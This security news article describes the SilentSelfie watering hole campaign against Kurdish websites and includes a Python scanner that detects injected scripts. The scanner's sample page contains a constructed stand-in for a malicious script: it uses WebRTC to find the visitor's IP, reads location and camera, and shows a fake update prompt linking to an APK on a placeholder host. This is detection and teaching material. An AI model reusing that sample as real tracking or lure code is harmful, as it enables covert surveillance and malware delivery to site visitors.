SilentSelfie Exploited 25 Websites To Deploy Malicious Android Application

Threat actors are increasingly turning to websites as a means to execute a variety of cyberattacks, capitalizing on vulnerabilities found in web applications and user behavior. Among the most prevalent tactics employed are phishing schemes, which trick users into divulging sensitive information, and drive-by downloads that infect systems without user consent when visiting compromised sites.

SilentSelfie Exploited 25 Websites

In early 2024, researchers from Sekoia’s Threat Detection & Research team uncovered a sophisticated cyber espionage campaign dubbed “SilentSelfie,” specifically targeting Kurdish communities. This campaign has exploited a total of 25 compromised websites, utilizing four distinct variants of malicious JavaScript code to gather intelligence.

The malicious scripts varied in complexity, ranging from basic location trackers to intricate frameworks capable of accessing users’ selfie cameras. These scripts directed selected targets to install a malicious Android application, masquerading as a benign news app.

Active since late 2022, the “SilentSelfie” campaign employed techniques such as watering hole attacks alongside a covert Android application. This application not only collected system information but also accessed contacts and files, beaming user locations back to the attackers through a hidden “LocationHelper” service.

To obscure their operations, the attackers employed obfuscation techniques, utilizing tools like Obfuscator.io and ProGuard. They also leveraged WebRTC for IP address discovery and cookies for user tracking, enhancing their ability to remain undetected.

The infrastructure of this campaign hinges on two critical components: compromised web servers and dedicated attacker-controlled servers. Communication between the two was relayed through PHP scripts, which helped the activity avoid detection.

While the attacks have been linked to groups such as StrongPity, the tactics, techniques, and procedures (TTPs) observed do not align with those of known threat actors, suggesting the emergence of a previously unidentified advanced persistent threat (APT) group targeting Kurdish interests.

A total of 21 Kurdish websites were subjected to this watering hole campaign, spanning various sectors, including media outlets, political organizations, and militant groups. The compromised sites were primarily associated with “Rojava” (North-East Syria), “YPG forces,” and far-left Turkish-Kurdish political entities.

The attackers utilized malicious JavaScript injections to generate fake update prompts, deceiving visitors into downloading compromised Android apps and granting permissions for camera and GPS access. These permissions were exploited to exfiltrate sensitive data, including precise location coordinates and facial images.
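The traits described above (WebRTC used for IP address discovery, cookies for visitor tracking, geolocation and camera access, and a fake update prompt pushing an Android package) can be turned into a simple triage check for site owners who suspect a watering hole injection. The following Python scanner is an added example for this article, not code from Sekoia's report or from the campaign itself: it pulls inline scripts out of a page with the standard-library HTML parser, matches each one against a small set of indicator patterns, and flags scripts that hit several indicators at once. The indicator names, the scoring threshold and the sample page (including the stand-in "injected" script and the `example.invalid` URL) are all constructed for the demonstration.

```python
import re
from html.parser import HTMLParser

# Indicator patterns derived from the behaviours the report describes. The names
# and regexes are constructed for this example; tune them for real pages.
INDICATORS = {
    "webrtc_ip_discovery": re.compile(r"RTCPeerConnection|onicecandidate|createDataChannel"),
    "geolocation": re.compile(r"navigator\.geolocation\.(getCurrentPosition|watchPosition)"),
    "camera_access": re.compile(r"getUserMedia\s*\(\s*\{[^}]*video"),
    "cookie_tracking": re.compile(r"document\.cookie\s*="),
    "apk_download": re.compile(r"\.apk\b", re.IGNORECASE),
    "update_prompt": re.compile(r"update", re.IGNORECASE),
}

# A script is flagged when it matches at least this many distinct indicators;
# a single hit (e.g. a cookie write) is too common on benign pages to act on.
SUSPICIOUS_THRESHOLD = 3


class ScriptExtractor(HTMLParser):
    """Collect inline <script> bodies and the src of external scripts."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.inline_scripts = []
        self.external_srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.external_srcs.append(src)  # external: record for separate review
            else:
                self.in_script = True
                self.inline_scripts.append("")  # start a new inline body

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self.in_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> content as data (possibly in chunks).
        if self.in_script:
            self.inline_scripts[-1] += data


def score_script(js: str) -> list:
    """Return the names of the indicators that match this script body."""
    return [name for name, rx in INDICATORS.items() if rx.search(js)]


def scan_html(html: str) -> dict:
    """Extract scripts from a page and flag inline ones with clustered indicators."""
    parser = ScriptExtractor()
    parser.feed(html)
    scripts = []
    for idx, js in enumerate(parser.inline_scripts):
        matched = score_script(js)
        scripts.append({
            "script": idx,
            "indicators": matched,
            "suspicious": len(matched) >= SUSPICIOUS_THRESHOLD,
        })
    return {"scripts": scripts, "external_sources": parser.external_srcs}


# Constructed sample page: one benign cookie-writing script, one external
# script reference, and one stand-in for an injected script with the traits
# the report describes. No real site content or URLs are used.
SAMPLE_PAGE = """<html><head><title>News</title>
<script>
  // constructed benign snippet: remembers a UI preference in a cookie
  document.cookie = "theme=dark; path=/";
</script>
<script src="https://cdn.example.invalid/lib.js"></script>
</head><body>
<h1>Headlines</h1>
<script>
  // constructed stand-in for an injected script; report() is hypothetical
  var pc = new RTCPeerConnection({iceServers: []});
  pc.createDataChannel("");
  pc.onicecandidate = function (e) { report(e); };
  navigator.geolocation.getCurrentPosition(report);
  navigator.mediaDevices.getUserMedia({video: true}).then(report);
  document.cookie = "vid=" + Math.random();
  if (confirm("A new update is available. Install now?")) {
    location.href = "https://example.invalid/news-update.apk";
  }
</script>
</body></html>"""

if __name__ == "__main__":
    report = scan_html(SAMPLE_PAGE)
    for entry in report["scripts"]:
        flag = "SUSPICIOUS" if entry["suspicious"] else "ok"
        print(f"inline script {entry['script']}: {flag} {entry['indicators']}")
    print("external scripts to review:", report["external_sources"])
```

Run against a saved copy of a page, the scanner reports which inline scripts cluster several of the campaign's traits and lists external script sources for manual review. The threshold matters: a lone cookie write or the word "update" appears on countless legitimate pages, whereas WebRTC candidate gathering, geolocation, camera access and an `.apk` link together in one script is a combination worth escalating.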

Remarkably, the campaign remained undetected for over 18 months, despite multiple on-screen notifications. While attributing the attacks is complex, potential culprits include Turkish intelligence services, Syrian government agencies, and the Kurdistan Regional Government of Iraq, with Iran and Russia considered less likely candidates.

The relatively simplistic nature of the incidents, characterized by basic obfuscation methods and the absence of complex malware, suggests the involvement of either an emerging threat actor or one with limited capabilities. Notable compromised sites included ‘RojNews,’ ‘YPG Rojava,’ and websites affiliated with ‘DHKP-C’ and ‘PAJK.’

The extensive scope and duration of this campaign underscore the persistent cyber threats faced by Kurdish organizations, highlighting the urgent need for enhanced security measures in the region.
